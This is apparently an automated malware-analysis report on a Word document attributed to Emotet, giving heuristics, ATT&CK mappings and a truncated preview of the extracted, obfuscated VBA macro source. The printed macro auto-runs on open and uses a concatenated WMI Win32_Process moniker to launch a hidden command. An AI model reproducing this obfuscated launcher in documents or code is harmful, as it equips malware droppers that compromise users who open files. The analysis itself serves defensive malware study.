MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
This document contains VBA macros that trigger an AutoOpen event, which in turn uses GetObject and CreateObject to launch the Win32_Process WMI class. This is a common technique used by Emotet to download and execute a second-stage payload. The ClamAV detection name further supports the Emotet family attribution.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-6964648-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6964648-0
- VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] (OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5344 bytes |
SHA-256 (macros.bas): 867414fa100558e22beda31c37c10be63c1b8caa0c619b6376265b8c31ecd394
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "B3706351"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "z048260"
Attribute VB_Base = "0{E1349350-99E0-4A72-90F3-1977DB684D66}{83EDA91E-4E8B-4958-96BB-65346C640174}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "T_3475"
Attribute VB_Name = "N425_1"
Attribute VB_Name = "m9153981"
Attribute VB_Name = "l39074"
Attribute VB_Name = "E93758_"
Attribute VB_Name = "X405633"
Attribute VB_Name = "i60_461"
Attribute VB_Name = "G62861"
Attribute VB_Base = "0{AF74C80E-C402-4FA3-81E2-EEA631A2F93F}{1514659B-70B5-477D-B805-1A050E82944F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Z2393_"
Function T313604(V57233)
While d4_266 And J16354
'z696250v975399p299_59o459698
Wend
While z885444 And Z_27110
'd0_39805k43589U04460A7_668
Wend
While Y71482 And H287173
'I4_48352u8199_4C155_7M69290
Wend
Set T313604 = CVar(V57233)
While f502_959 And q6930442
'r156004J20601_J36_771z01_2281
Wend
While V38472 And c747186
'i038_561j_9610_j497446f422_91
Wend
While F68976 And O68689
'p85__6B979313k37996N10_97_8
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While h71155 And K5035_80
'q48757P_5_158Q7370561C8_1038
Wend
While K30223 And I922281
'u1622_56Y929527u016842a9305245
Wend
While D51806 And z792_21
'z963_936G6_1264R7239326Q859462
Wend
Call h10843
While b547092 And D662343
'G838632O_72536o4_1105z684407
Wend
While v__46876 And z8_515
'M40915f935599q7798_35C34593
Wend
While E130647 And W_821753
'r7_48971j366413R828981D8159200
Wend
End Sub
Attribute VB_Name = "D_35423"
Function h10843()
On Error Resume Next
While v4_7621 And z6774422
'R_297_3Y1710874d9730264f945065
Wend
While w0_87_67 And M00305
'i6_286p89864R00162J904590
Wend
While V031241 And H357_2
's0575_11c76_1775H263_870n772534
Wend
u203158 = z048260.m93057.ControlTipText + G62861.G482_58_ + z048260.m93057.PasswordChar + G62861.k547868_ + z048260.m93057.PasswordChar + z048260.m93057 + G62861.S16_30 + z048260.m93057.ControlTipText + z048260.m93057.ControlTipText + G62861.M265494 + z048260.m93057.PasswordChar + G62861.W97271 + z048260.m93057.PasswordChar
While J548_363 And Q847621
'j3548067d1190112u7038894F51718
Wend
While U775866 And o23455_
'z898733k6198_A107727p893892
Wend
Set i30816_4 = T313604(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
While j57423 And S519_20
'Y09__03v53282s6776_o8_036
Wend
While K266436 And W406_692
'n449083Z21178X87_7_f85259
Wend
While v79296 And p00_533
'I03411_7h40533_9Q79327Y_7129
Wend
i30816_4.Create D304702 + u203158 + O054302, W95258, V890227, z9_881
While J3230211 And i37_1524
'w__699j83243C9251_T365411
Wend
While b05_7002 And b1641_8
'G51404E22__2Y_2052z5_5123_
Wend
While f8957_3 And C_49838
'D17_23S12546H8799818z830_433
Wend
End Function
Attribute VB_Name = "i677857"
Public Function V890227()
While o2_99_ And U10188
'i40_091A8903746t076_580p688793
Wend
While B62443 And F2670696
'V83778i49_43l5465_71p11_2350
Wend
While L336862 And i93_65_5
'p8554363V601_897m30_9324m0641899
Wend
Set V890227 = T313604(GetObject("winmgm
... (truncated)